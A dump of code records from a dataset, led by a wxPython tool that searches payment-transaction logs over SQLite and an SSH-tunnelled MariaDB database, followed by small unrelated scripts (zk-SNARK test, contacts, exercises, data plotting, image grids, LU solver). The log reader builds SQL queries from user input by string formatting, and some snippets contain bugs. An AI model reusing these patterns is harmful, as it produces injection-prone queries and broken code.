self.comboCtrl.GetValue()\n env = config[env]\n if os.path.exists(env['database'] + \".sqlite\"):\n os.remove(env['database'] + \".sqlite\")\n wx.MessageBox(message=\"Cache file {} has been deleted\".format(env['database'] + \".sqlite\"),\n caption='Cache was cleaned',\n style=wx.OK | wx.ICON_INFORMATION)\n\n def put_data_from_dict(self, message_dict, file=None):\n\n direction = 0\n if message_dict.get('inbound'):\n iso_dict = 'inbound'\n direction = 0\n inbound_message = message_dict.get(iso_dict)\n if file:\n self.data.append(\n Almanah(inbound_message.get('date', \"\"), inbound_message.get('externalid', \"\"),\n inbound_message.get('011', \"\"),\n inbound_message.get('037', \"\"), inbound_message.get('002', \"\"), file, inbound_message.get('039', \"\"),\n direction))\n inbound_html = \"

    Принято из DHI

    {}\".format(\n '
    '.join(\n '{}: {}'.format(key, val) for key, val in sorted(inbound_message.items()) if\n val))\n self.inboundTxt.SetPage(inbound_html, \"\")\n if message_dict.get('outbound'):\n iso_dict = 'outbound'\n direction = 1\n outbound_message = message_dict.get(iso_dict)\n if file:\n self.data.append(\n Almanah(outbound_message.get('date', \"\"), outbound_message.get('externalid', \"\"),\n outbound_message.get('011', \"\"),\n outbound_message.get('037', \"\"), outbound_message.get('002', \"\"),\n outbound_message.get('039', \"\"),\n direction, file))\n\n outbound_html = \"

    Отправлено в DHI

    {}\".format(\n '
    '.join(\n '{}: {}'.format(key, val) for key, val in sorted(outbound_message.items())\n if val))\n self.outboundTxt.SetPage(outbound_html, \"\")\n\n if message_dict.get('frntn'):\n frntn_message = message_dict.get('frntn')\n frntn_html = \"

    Отправлено в МПС

    {}\".format(\n '
    '.join(\n '{}: {}'.format(key, val) for key, val in sorted(frntn_message.items()) if\n val))\n self.fitcpTxt.SetPage(frntn_html, \"\")\n if message_dict.get('fitcp'):\n fitcp_message = message_dict.get('fitcp')\n fitcp_html = \"

    Принято из МПС

    {}\".format(\n '
    '.join(\n '{}: {}'.format(key, val) for key, val in sorted(fitcp_message.items()) if\n val))\n self.frntnTxt.SetPage(fitcp_html, \"\")\n busyDlg = None\n\n def get_data(self, event):\n \"\"\"\n Get SQL data and add it to display\n \"\"\"\n self.data = []\n\n pcard = self.card.GetValue()\n pimid = self.timid.GetValue()\n prrn = self.trrn.GetValue()\n pstan = self.tstan.GetValue()\n ptst = self.dst.GetValue().IsValid()\n pted = self.ded.GetValue().IsValid()\n env = self.comboCtrl.GetValue()\n\n env = config[env]\n\n datelist = []\n if ptst:\n datelist.append(datetime.strptime(\n \"{}-{}-{}\".format(self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1,\n self.dst.GetValue().GetDay()), \"%Y-%m-%d\"))\n if pted:\n datelist.append(datetime.strptime(\n \"{}-{}-{}\".format(self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1,\n self.ded.GetValue().GetDay()), \"%Y-%m-%d\"))\n zipgrep_cause = []\n if pcard:\n zipgrep_cause.append(\"[i002]*{}\".format(pcard))\n if pimid:\n zipgrep_cause.append(\"External ID.+{}\".format(pimid))\n if prrn:\n zipgrep_cause.append(\"[i037]*{}\".format(prrn))\n if pstan:\n zipgrep_cause.append(\"[i011]*{}'\".format(pstan))\n fstring = \"|\".join(map(str, zipgrep_cause))\n\n\n where_cause = []\n if pcard:\n where_cause.append(\"card_number like '{}%'\".format(pcard))\n if pimid:\n where_cause.append(\"external_id like '{}%'\".format(pimid))\n if prrn:\n where_cause.append(\"rrn like '{}%'\".format(prrn))\n if pstan:\n where_cause.append(\"stan like '{}%'\".format(pstan))\n if ptst or pted:\n if ptst and pted:\n where_cause.append(\"date between '{}-{:02d}-{:02d} 00:00:00' and '{}-{:02d}-{:02d} 23:59:59'\".format(\n self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1, self.dst.GetValue().GetDay(),\n self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1, self.ded.GetValue().GetDay()))\n elif ptst:\n where_cause.append(\"date between '{}-{:02d}-{:02d} 00:00:00' and '{}-{:02d}-{:02d} 23:59:59'\".format(\n self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1, self.dst.GetValue().GetDay(),\n self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1, self.dst.GetValue().GetDay()))\n elif pted:\n where_cause.append(\"date between '{}-{:02d}-{:02d} 00:00:00' and '{}-{:02d}-{:02d} 23:59:59'\".format(\n self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1, self.ded.GetValue().GetDay(),\n self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1, self.ded.GetValue().GetDay()))\n\n if where_cause:\n msg = \"Processing sql data...\"\n busyDlg = wx.BusyInfo(msg)\n try:\n # _almanah_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, ST.filename, ST.resp_code, ST.direction from small_table as ST where ST.external_id=(select external_id from small_table where {})\"\"\".format(\" and \".join(map(str, where_cause)))\n _almanah_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, ST.filename, ST.resp_code, ST.direction from small_table as ST where {} LIMIT 100\"\"\".format(\n \" and \".join(map(str, where_cause)))\n _, sql_data = search_sqlite(env['database'] + \".sqlite\", _almanah_select)\n if not sql_data:\n try:\n sql_data = get_from_mysql(env['hostname'], env['username'], env['password'],\n env['sql_username'],\n env['sql_password'], env['database'],\n \" and \".join(map(str, where_cause)))\n if sql_data:\n write_almanah_sqlite(env['database'] + \".sqlite\", sql_data)\n except Exception as exc:\n wx.MessageBox(message='{}'.format(str(exc)),\n caption='Error retriving from cache',\n style=wx.OK | wx.ICON_ERROR)\n\n if sql_data:\n for sql_message in sql_data:\n self.data.append(\n Almanah(sql_message[0], sql_message[1], sql_message[2], sql_message[3], sql_message[4],\n sql_message[5], sql_message[6], sql_message[7]))\n self.update_display()\n busyDlg = wx.BusyInfo(\"Processed file {}\".format(sql_message[5]))\n message_dict = server_cli_proccess(env, sql_message[5], fstring)\n if message_dict.get('inbound'):\n if message_dict.get('inbound').get('037'):\n s_rrn = message_dict.get('inbound').get('rrn')\n t_dict = server_cli_proccess(env, sql_message[5], s_rrn)\n message_dict.update(t_dict)\n elif message_dict.get('outbound'):\n if message_dict.get('outbound').get('037'):\n rrn = message_dict.get('outbound').get('037')\n t_dict = server_cli_proccess(env, sql_message[5], rrn)\n message_dict.update(t_dict)\n self.put_data_from_dict(message_dict)\n\n else:\n if ptst or pted:\n busyDlg = None\n dlg = wx.MessageDialog(None, \"Nothing found. Do you want to search on log archives?\",\n \"Long time action...\", wx.YES_NO | wx.ICON_QUESTION)\n dlg_result = dlg.ShowModal() == wx.ID_YES\n dlg.Destroy()\n if dlg_result:\n\n busyDlg = wx.BusyInfo(\"Searching in files on archive server\")\n files_to_append = list_files(datelist, env['hostname'], env['username'], env['password'],\n env['folder'], env['filemask'], env['parallel'], fstring)\n for file in files_to_append:\n busyDlg = wx.BusyInfo(\"Processed file {}\".format(file))\n message_dict = server_cli_proccess(env, file, fstring)\n if message_dict.get('inbound').get('037'):\n s_rrn = message_dict.get('inbound').get('rrn')\n t_dict = server_cli_proccess(env, file, s_rrn)\n message_dict.update(t_dict)\n self.put_data_from_dict(message_dict, file)\n\n\n \"\"\"\n server_file_process(env, file)\n\n _almanah_select = \"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, ST.filename, ST.resp_code, ST.direction from small_table as ST where {}\".format(\n \" and \".join(map(str, where_cause)))\n _, sql_data = search_sqlite(env['database'] + \".sqlite\", _almanah_select)\n if sql_data:\n for sql_message in sql_data:\n self.data.append(\n Almanah(sql_message[0], sql_message[1], sql_message[2], sql_message[3],\n sql_message[4],\n sql_message[5], sql_message[6], sql_message[7]))\n \"\"\"\n\n except Exception as exc:\n wx.MessageBox(message=str(exc),\n caption='Error during fetching',\n style=wx.OK | wx.ICON_ERROR)\n else:\n wx.MessageBox(message=\"Please specify at least one parameter\",\n caption='Parameters not found',\n style=wx.OK | wx.ICON_ERROR)\n busyDlg = None\n self.update_display()\n\n # ----------------------------------------------------------------------\n def on_right_click(self, event):\n self.Bind(wx.EVT_CONTEXT_MENU, self.OnShowPopup)\n\n def OnShowPopup(self, event):\n self.popupmenu = wx.Menu()\n menuItem = wx.MenuItem(self.popupmenu, wx.NewId(), 'Create DHI Request')\n menuItem2 = wx.MenuItem(self.popupmenu, wx.NewId(), 'Load From File')\n self.popupmenu.Append(menuItem)\n self.popupmenu.Append(menuItem2)\n self.popupmenu.Bind(wx.EVT_MENU, self.Create_DHI, menuItem)\n self.popupmenu.Bind(wx.EVT_MENU, self.Load_File, menuItem2)\n pos = event.GetPosition()\n pos = self.ScreenToClient(pos)\n event.GetEventObject().SetFocus()\n self.PopupMenu(self.popupmenu, pos)\n\n def Create_DHI(self, event):\n global dhi_message\n if dhi_message:\n filename = self.save_dialog()\n create_request(filename, dhi_message)\n print(dhi_message)\n\n def Load_File(self, event):\n global dhi_message\n busyDlg = None\n base_path = os.path.dirname(os.path.abspath(__file__))\n obj = self.almOlv.GetSelectedObject()\n\n env = self.comboCtrl.GetValue()\n env = config[env]\n thread = threading.Thread(target=server_file_process, args=(env, obj.filename))\n thread.setDaemon(True)\n thread.start()\n # ----------------------------------------------------------------------\n def on_select(self, event):\n \"\"\"\n Load the summary in the text control\n \"\"\"\n global dhi_message\n busyDlg = None\n base_path = os.path.dirname(os.path.abspath(__file__))\n obj = self.almOlv.GetSelectedObject()\n\n env = self.comboCtrl.GetValue()\n env = config[env]\n\n try:\n _, tsql_out_data = search_sqlite(env['database'] + \".sqlite\",\n \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n 'outbound_messages', obj.external_id))\n _, tsql_in_data = search_sqlite(env['database'] + \".sqlite\",\n \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n 'inbound_messages', obj.external_id))\n except Exception as exc:\n busyDlg = wx.BusyInfo(\"Not found in Cache Extgernal_ID {}\".format(obj.external_id))\n\n if not (tsql_out_data or tsql_in_data):\n message_dict = server_cli_proccess(env, obj.filename, obj.rrn)\n if message_dict.get('inbound').get('037'):\n s_rrn = message_dict.get('inbound').get('rrn')\n t_dict = server_cli_proccess(env, obj.filename, s_rrn)\n message_dict.update(t_dict)\n self.put_data_from_dict(message_dict)\n\n else:\n try:\n sql_out_names, sql_out_data = search_sqlite(env['database'] + \".sqlite\",\n \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n 'outbound_messages', obj.external_id))\n sql_in_names, sql_in_data = search_sqlite(env['database'] + \".sqlite\",\n \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n 'inbound_messages', obj.external_id))\n if sql_out_data:\n outbound_message = dict(zip(sql_out_names, sql_out_data[0]))\n dhi_message = outbound_message\n outbound_html = \"

    Отправлено в DHI

    {}\".format(\n '
    '.join('{}: {}'.format(key, val) for key, val in sorted(outbound_message.items()) if val))\n self.outboundTxt.SetPage(outbound_html, \"\")\n if sql_in_data:\n inbound_message = dict(zip(sql_in_names, sql_in_data[0]))\n inbound_html = \"

    Принято из DHI

    {}\".format(\n '
    '.join('{}: {}'.format(key, val) for key, val in sorted(inbound_message.items()) if val))\n self.inboundTxt.SetPage(inbound_html, \"\")\n mes_rrn = inbound_message.get('Response_ReferenceNumber')\n if mes_rrn:\n sql_fitcp_names, sql_fitcp_data = search_sqlite(env['database'] + \".sqlite\",\n \"\"\"SELECT * from {} WHERE `037`='{}'\"\"\".format(\n 'tcpip_messages', mes_rrn))\n if sql_fitcp_data:\n fitcp_message = dict(zip(sql_fitcp_names, sql_fitcp_data[0]))\n fitcp_html = \"

    Принято из МПС

    {}\".format(\n '
    '.join('{}: {}'.format(key, val) for key, val in sorted(fitcp_message.items()) if val))\n self.fitcpTxt.SetPage(fitcp_html, \"\")\n sql_frntn_names, sql_frntn_data = search_sqlite(env['database'] + \".sqlite\",\n \"\"\"SELECT * from {} WHERE `037`='{}'\"\"\".format(\n 'frntn_messages', mes_rrn))\n if sql_frntn_data:\n frntn_message = dict(zip(sql_frntn_names, sql_frntn_data[0]))\n frntn_html = \"

    Отправлено в МПС

    {}\".format(\n '
    '.join('{}: {}'.format(key, val) for key, val in sorted(frntn_message.items()) if val))\n self.frntnTxt.SetPage(frntn_html, \"\")\n except Exception as exc:\n wx.MessageBox(message='{}'.format(str(exc)),\n caption='Error retriving from cache',\n style=wx.OK | wx.ICON_ERROR)\n\n # ----------------------------------------------------------------------\n def update_display(self):\n \"\"\"\n Update the RSS feed display\n \"\"\"\n self.almOlv.SetColumns([\n ColumnDefn(\"Date\", \"left\", 150, \"date\"),\n ColumnDefn(\"Card\", \"left\", 100, \"card_number\"),\n ColumnDefn(\"ExternalID\", \"left\", 100, \"external_id\"),\n ColumnDefn(\"RRN\", \"left\", 100, \"rrn\"),\n ColumnDefn(\"Stan\", \"left\", 100, \"stan\"),\n ColumnDefn(\"RespCode\", \"left\", 100, \"resp_code\"),\n ])\n self.almOlv.SetObjects(self.data)\n\n\ndef server_file_process(env, filename):\n busyDlg = wx.BusyInfo(\"Downloading {}\".format(filename))\n ret_file = get_file(filename, env['hostname'], env['username'], env['password'], env['folder'])\n busyDlg = None\n if ret_file:\n if os.path.exists(ret_file):\n busyDlg = wx.BusyInfo(\"Processing {}\".format(filename))\n try:\n (all_outbound_messages, all_inbound_messages, all_fitcp, all_frntn) = run_mp(ret_file)\n except Exception as exc:\n wx.MessageBox(message='Error {} processing {}'.format(str(exc), ret_file),\n caption='Processing error',\n style=wx.OK | wx.ICON_ERROR)\n\n busyDlg = wx.BusyInfo(\"Caching {}\".format(filename))\n try:\n cache_to_db(env, all_outbound_messages, all_inbound_messages, all_fitcp, all_frntn, filename)\n except Exception as exc:\n wx.MessageBox(message='Error {} caching {}'.format(str(exc), ret_file),\n caption='Caching error',\n style=wx.OK | wx.ICON_ERROR)\n busyDlg = None\n else:\n wx.MessageBox(message='File not found {}'.format(ret_file),\n caption='Error during downloading',\n style=wx.OK | wx.ICON_ERROR)\n else:\n wx.MessageBox(message='File not exists',\n caption='Error during downloading',\n style=wx.OK | wx.ICON_ERROR)\n\n\n\ndef get_from_mysql(hostname, ssh_login, ssh_password, db_user, db_password, database, query):\n _local_mysql_port = 3309\n #random.randint(1024,65536)\n #print (_local_mysql_port)\n _local_bind_address = '0.0.0.0'\n _remote_bind_address = '127.0.0.1'\n _remote_mysql_port = 3306\n # _base_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, files.filename, ST.resp_code, ST.direction from small_table as ST join files on files.ID=ST.filename where ST.external_id=(select external_id from small_table where {} limit 1)\"\"\".format(query)\n _base_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, files.filename, ST.resp_code, ST.direction from small_table as ST join files on files.ID=ST.filename where {} LIMIT 100\"\"\".format(\n query)\n\n #sshtunnel.SSH_TIMEOUT = 10.0\n #sshtunnel.TUNNEL_TIMEOUT = 10.0\n DEFAULT_LOGLEVEL = 'DEBUG'\n\n try:\n with sshtunnel.SSHTunnelForwarder(\n (hostname),\n ssh_username=ssh_login,\n ssh_password=ssh_password,\n remote_bind_address=(_remote_bind_address, _remote_mysql_port)\n #debug_level='DEBUG'\n #local_bind_address=(_local_bind_address, _local_mysql_port)\n ) as tunnel:\n try:\n connection = None\n connection = mariadb.connect(\n connect_timeout=60,\n user=db_user,\n password=db_password,\n host=_remote_bind_address,\n database=database,\n compress=False,\n pool_size=1,\n pool_reset_session=False,\n port=tunnel.local_bind_port\n )\n if connection.is_connected():\n coursor = connection.cursor()\n #print(\"Executed query: {}\".format(_base_select))\n coursor.execute(_base_select)\n if coursor.with_rows:\n sql_data = coursor.fetchall()\n return sql_data\n else:\n return None\n else:\n wx.MessageBox(message=\"Error fetching from mysql\",\n caption='Error creating tunnel',\n style=wx.OK | wx.ICON_ERROR)\n return None\n except Exception as exc:\n print(\"MySQL connection error {}\".format(str(exc)))\n raise\n finally:\n connection.close()\n except sshtunnel.BaseSSHTunnelForwarderError as exc:\n print(\"SshTunnel Error {}\".format(str(exc)))\n raise\n finally:\n tunnel.close()\n\n\n########################################################################\nclass logFrame(wx.Frame):\n \"\"\"\"\"\"\n\n # ----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Frame.__init__(self, None, title=\"Online Log Reader\", size=(1600, 900))\n panel = logPanel(self)\n self.Show()\n\n\n# ----------------------------------------------------------------------\nif __name__ == \"__main__\":\n multiprocessing.freeze_support()\n app = wx.App(False)\n frame = logFrame()\n app.MainLoop()\n","sub_path":"gx_log_reader.py","file_name":"gx_log_reader.py","file_ext":"py","file_size_in_byte":28652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"385995412","text":"import zk_snark as zk\n\npv = zk.prover(97)\nAT, BT, CT, HT = pv.QAP()\n\nvf = zk.verifier(4,3,4,5,6)#t_0, k_a, k_b, k_c, b\npublic_1_a, public_1_b, public_1_c, public_1_g= vf.gen_pub_1()\n\n\n\n#1\np_n_a, p_n_b, p_n_c, p_n_h = pv.get_proof_1(public_1_a, public_1_b, public_1_c, public_1_g)\nresult_1 = vf.verify_1(AT, BT, CT, HT, p_n_a, p_n_b, p_n_c, p_n_h)\nprint(\"result_1 = %s\", result_1)\n\npublic_2_a, public_2_b, public_2_c = vf.gen_pub_2()\n#2\np_n_a_2, p_n_b_2, p_n_c_2 = pv.get_proof_2(public_2_a, public_2_b, public_2_c)\nresult_2 = vf.verify_2(p_n_a_2, p_n_b_2, p_n_c_2)\nprint(\"result_2 = %s\", result_2)\n\npublic_3 = vf.gen_pub_3()\n#3\np_n = pv.get_proof_3(public_3)\nresult_3 = vf.verify_3(p_n)\nprint(\"result_3 = %s\", result_3)","sub_path":"Security/security_8-master/security_8/test_zk_snark.py","file_name":"test_zk_snark.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"120937677","text":"import db.core as db\r\ndef run():\r\n nombre = input(\"Nombre: \")\r\n apellido = input(\"Apelllido: \")\r\n telefono = input(\"Teléfono: \")\r\n if (telefono.isdigit() == False and telefono[0] != '+'):\r\n print(\"¡Error, el número de teléfono solo puede contener números!\")\r\n return\r\n\r\n contactos = db.read()\r\n contactos.append({\r\n 'nombre': nombre,\r\n 'apellido': apellido,\r\n 'telefono': int(telefono)\r\n })\r\n\r\n db.save(contactos)\r\n print('[+] Contacto añadido')\r\n","sub_path":"sections/add_contact.py","file_name":"add_contact.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"349513775","text":"from itertools import chain\n\n\ndef ex1(l: list) -> list:\n return sorted(l, key=lambda x: x[1])\n\n\ndef ex2(l: list, s: str) -> bool:\n return s in [i[1] for i in l]\n\n\noperations = {\"+\": lambda a, b: a + b,\n \"*\": lambda a, b: a * b,\n \"/\": lambda a, b: a / b,\n \"%\": lambda a, b: a % b\n }\n\n\ndef ex3(op, a, b):\n return operations['op'](a, b)\n\n\ndef ex5(*params):\n d = {}\n for i in params:\n for key, value in i.items():\n if key in d:\n d[key] = [value] + d[key]\n else:\n d[key] = [value]\n return dict(map(lambda k: (k[0], k[1][0]) if len(k[1]) == 1 else k, d.items()))\n\n\ndef ex6(d: dict, sep='-', h=''):\n for key, value in d.items():\n if type(value) != type({}):\n print(f'{h}{key}{sep}{value}')\n else:\n ex6(value, h=f\"{h}{key}{sep}\")\n0\n\na = {\n\n 'a': 1,\n\n 'b':\n\n {\n\n 'c': 3,\n\n 'd':\n\n {\n\n 'e': 5,\n\n 'f': 6\n\n }\n\n }\n\n}\nex6(a)\n","sub_path":"python/caz1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"10084721","text":"import itertools\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas\nfrom scipy import stats\nfrom scipy.stats import pearsonr\n\n\ndef plot_bargraph(title, category, values, x_label, y_label):\n # this is for plotting purpose\n index = np.arange(len(category))\n plt.figure(1, figsize=[6, 3.5], dpi=120, facecolor='w', edgecolor='black')\n plt.bar(index, values)\n plt.xlabel(x_label, fontsize=10)\n plt.ylabel(y_label, fontsize=10)\n plt.xticks(index, category, fontsize=10, rotation=90)\n plt.title(title)\n plt.show();\n\n\ndef plot_functiongraph(title, x, y, label_x, label_y, label_legend):\n plt.plot(x, y, label=label_legend)\n # naming the x axis\n plt.xlabel(label_x)\n # naming the y axis\n plt.ylabel(label_y)\n # giving a title to my graph\n plt.title(title)\n\n # show a legend on the plot\n plt.legend()\n\n # function to show the plot\n plt.show()\n return\n\n\ndef plot_boxnotch_univariateanalysis(data, features_name):\n fig2 = plt.figure(2, figsize=[10, 4.5], dpi=95, facecolor='w', edgecolor='black')\n numero_features = len(data)\n d = []\n for f in range(0, numero_features, 1):\n d.append(list(data[f]))\n plt.boxplot(d, notch=True)\n plt.title(f)\n fig2.show()\n return\n\n\ndef plot_correlationbtw2V(title, data1, data2, righe, colonne, indice, cm):\n plt.subplot(righe, colonne, indice)\n plt.plot(data1, data2, cm)\n # plt.tight_layout()\n plt.subplots_adjust(left=-0.2, right=0.8, top=0.8, bottom=-0.5)\n plt.title(title)\n return\n\n\ndef distinct(lista):\n distinct_lista = []\n map(lambda x: not x in distinct_lista and distinct_lista.append(x), lista)\n return distinct_lista\n\n\ndef get_dict_fromOutcome(y):\n cls = distinct(y)\n cls.sort()\n d = {}\n for e in cls:\n d[e] = 0\n for e in y:\n d[e] = d[e] + 1\n return d\n\n\n# Usually useful with CATEGORICAL FEATURES => Univariate Analysis\ndef categorical_plot(title, y, x_label, y_label):\n d = get_dict_fromOutcome(y)\n axisx = []\n axisy = []\n for elm in d.keys():\n axisx.append(elm)\n for elm in d.values():\n axisy.append(elm)\n plot_bargraph(title, axisx, axisy, x_label, y_label)\n return\n\n\ndef info_univariate(data, features_name):\n d = np.array(data)\n data_t = np.transpose(d)\n for f in range(0, len(data_t), 1):\n ds = sorted(data_t[f])\n moda = stats.mode(ds)\n # print('Feature: {}:\\nMAX: --> {}\\nMIN: --> {}\\nAVG: --> {}\\nMODE: --> V:{} --> {}\\nMed --> {}\\n'.format(\n # features_name[f], np.max(data_t[f]),\n # np.min(data_t[f]),\n # round(np.mean(data_t[f]), 1),\n # moda[0], moda[1],\n # np.median(ds)))\n plot_boxnotch_univariateanalysis(data_t, features_name)\n return\n\n\ndef info_bivariate(data, features_name):\n thre = 0.4\n d = np.array(data)\n data_t = np.transpose(d)\n el = np.arange(0, len(data_t))\n combo_index = list(itertools.product(el, repeat=2))\n fig3 = plt.figure(1, figsize=[100, 70], dpi=30, facecolor='w', edgecolor='black')\n i = 1\n for e in combo_index:\n ind1 = e.__getitem__(0)\n ind2 = e.__getitem__(1)\n c, t = pearsonr(data_t[ind1], data_t[ind2])\n\n titolo = '\\n{} - {}\\nP: --> {}'.format(features_name[ind1], features_name[ind2], round(c, 2))\n print(titolo)\n # if c < thre and c > -thre:\n # plot_correlationbtw2V(titolo, data_t[ind1], data_t[ind2], len(data_t), len(data_t), i, 'r*')\n # else:\n # plot_correlationbtw2V(titolo, data_t[ind1], data_t[ind2], len(data_t), len(data_t), i, 'g.')\n # i = i + 1\n # # fig3.show()\n # plt.show()\n return\n\n\ndataframe = pandas.read_csv(\"../crypto_preprocessing/step5_horizontal/horizontal.csv\", delimiter=',',\n header=0)\n# data := lista di dati (ciascuna entry è a sua volta una lista)\ndata = dataframe.values\n\n# X := lista di dati (ciascuna entry è l'insieme delle sole features di ciascuna entry)\na = dataframe.drop(\n columns=[\"DateTime\", 'Symbol_1', 'Symbol_2', 'Symbol_3', 'Symbol_4', 'Symbol_5', 'Symbol_6', 'Symbol_7',\n 'Symbol_8'])\nprint(a)\ndd = a.values\ncol_name = a.columns.values\nprint(np.shape(data), \"\\n\", col_name)\ninfo_bivariate(dd, col_name)\n","sub_path":"crypto_runner/features_exploration.py","file_name":"features_exploration.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"608817387","text":"\r\nimport os, glob\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport numpy as np\r\nfrom pathlib import Path\r\n\r\ndef append_images(images, direction='horizontal',\r\n bg_color=(255,255,255), aligment='center'):\r\n \"\"\"\r\n Appends images in horizontal/vertical direction.\r\n\r\n Args:\r\n images: List of PIL images\r\n direction: direction of concatenation, 'horizontal' or 'vertical'\r\n bg_color: Background color (default: white)\r\n aligment: alignment mode if images need padding;\r\n 'left', 'right', 'top', 'bottom', or 'center'\r\n\r\n Returns:\r\n Concatenated image as a new PIL image object.\r\n \"\"\"\r\n widths, heights = zip(*(i.size for i in images))\r\n\r\n if direction=='horizontal':\r\n new_width = sum(widths)\r\n new_height = max(heights)\r\n else:\r\n new_width = max(widths)\r\n new_height = sum(heights)\r\n\r\n margin = 50 # margin between images\r\n offset = margin # offset from Top-Left\r\n \r\n\r\n if direction=='horizontal':\r\n new_width += (len(images) + 1)*margin\r\n else:\r\n new_height += (len(images) + 1)*margin\r\n\r\n new_im = Image.new('RGB', (new_width, new_height), color=bg_color)\r\n for im in images:\r\n if direction=='horizontal':\r\n y = margin\r\n if aligment == 'center':\r\n y = int((new_height - im.size[1])/2)\r\n elif aligment == 'bottom':\r\n y = new_height - im.size[1]\r\n new_im.paste(im, (offset, y))\r\n offset += im.size[0] \r\n else:\r\n x = margin\r\n if aligment == 'center':\r\n x = int((new_width - im.size[0])/2)\r\n elif aligment == 'right':\r\n x = new_width - im.size[0]\r\n new_im.paste(im, (x, offset))\r\n offset += im.size[1] # - 2*margin\r\n offset += margin\r\n # print(\"offset: {}\".format(offset))\r\n\r\n return new_im\r\n\r\ndef img_add_txt(file):\r\n blank_image = Image.open(file)\r\n # print(np.array(blank_image).shape)\r\n w = np.array(blank_image).shape[0]\r\n h = np.array(blank_image).shape[1]\r\n img_draw = ImageDraw.Draw(blank_image)\r\n\r\n font = ImageFont.truetype(\"calibrib.ttf\", 500) # timesbd.ttf\r\n txt = os.path.split(file)[-1].split('_')[0]\r\n img_draw.text((np.floor(h*0.9), np.floor(w*0.9)), f\"{txt}\", fill='white', font=font)\r\n # blank_image.save(savePath / f\"{os.path.split(file)[-1]}\")\r\n return blank_image\r\n\r\nif __name__ == \"__main__\":\r\n\r\n fireName = \"Sydney\"\r\n dataPath = Path(f\"E:\\Wildfire_Events_2020\\Results_Analysis\\{fireName}\")\r\n\r\n savePath = dataPath / \"imgArray\"\r\n if not os.path.exists(savePath):\r\n os.mkdir(savePath)\r\n\r\n ratio = 0.2 # scale ratio\r\n saveName = 'imgArray_{}'.format(ratio)\r\n\r\n print(\"\\n\\n===================> Start to Arrange Images Into Image Array <====================\")\r\n\r\n\r\n rowList = []\r\n fileNameList = glob.glob(str(dataPath / f\"*.png\"))\r\n print(len(fileNameList))\r\n for i in range(0, 12, 4):\r\n # print(f\"{i}-{i+4}\") \r\n sub_fileNameList = fileNameList[i:i+4]\r\n # print(f\"{i}-{i+4}: {sub_fileNameList}\") \r\n \r\n imageList = list(map(img_add_txt, sub_fileNameList))\r\n # imageList = list(map(Image.open, fileNameList))\r\n\r\n row = append_images(imageList, direction='horizontal')\r\n rowList.append(row)\r\n\r\n imgArray = append_images(rowList, direction='vertical')\r\n w, h = imgArray.size\r\n\r\n imgArray_scaled = imgArray.resize((int(np.floor(w*ratio)), int(np.floor(h*ratio))))\r\n\r\n print(\"----------------------------------------------------------------------------------\")\r\n print(\"savePath: {}\".format(savePath))\r\n imgArray_scaled.save(savePath / f\"{fireName}_imgArray_{ratio}.png\")\r\n imgArray_scaled.save(savePath / f\"{fireName}_imgArray_{ratio}.pdf\")\r\n print(\"===========================> Finished and be Saved! <=============================\")\r\n\r\n\r\n\r\n\r\n","sub_path":"gen_imgArr_fig_from_multiple_images.py","file_name":"gen_imgArr_fig_from_multiple_images.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"487200913","text":"# coding: UTF-8\n\nimport math\nimport cmath\nimport random\n\nimport scipy.linalg as slinalg\nimport numpy.linalg as linalg\nimport numpy as np\n\nimport lu\n\n#------------------------------------\n# function definition\n#------------------------------------\ndef direct_solver(a,b):\n return slinalg.solve(a,b)\ndef direct_lu_solver(a,b):\n lup = slinalg.lu_factor(a)\n return slinalg.lu_solve(lup,b)\n\ndef plu(a,b):\n (size,_) = a.shape\n (lu,p) = slinalg.lu_factor(a)\n l = np.zeros((size,size), dtype=np.complex128)\n u = np.zeros((size,size), dtype=np.complex128)\n for i in range(0,size):\n l[i,i] = 1\n for j in range(0,size):\n if i>j:\n l[i,j] = lu[i,j]\n else:\n u[i,j] = lu[i,j]\n c = np.zeros(size, dtype=np.complex128)\n for i in range(0,size):\n c[i] = b[i]\n for i in range(0,size):\n tmp = c[i]\n c[i] = c[p[i]]\n c[p[i]] = tmp\n return (l, u, c)\n\ndef lu_solver(a,b):\n\t(l,u,c) = plu(a,b)\n\ty = lu.l_step(l,c)\n\tx = lu.u_step(u,y)\n\treturn x\n\n\n#------------------------------------\n# test code\n#------------------------------------\n\n","sub_path":"lib_lu_solve.py","file_name":"lib_lu_solve.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 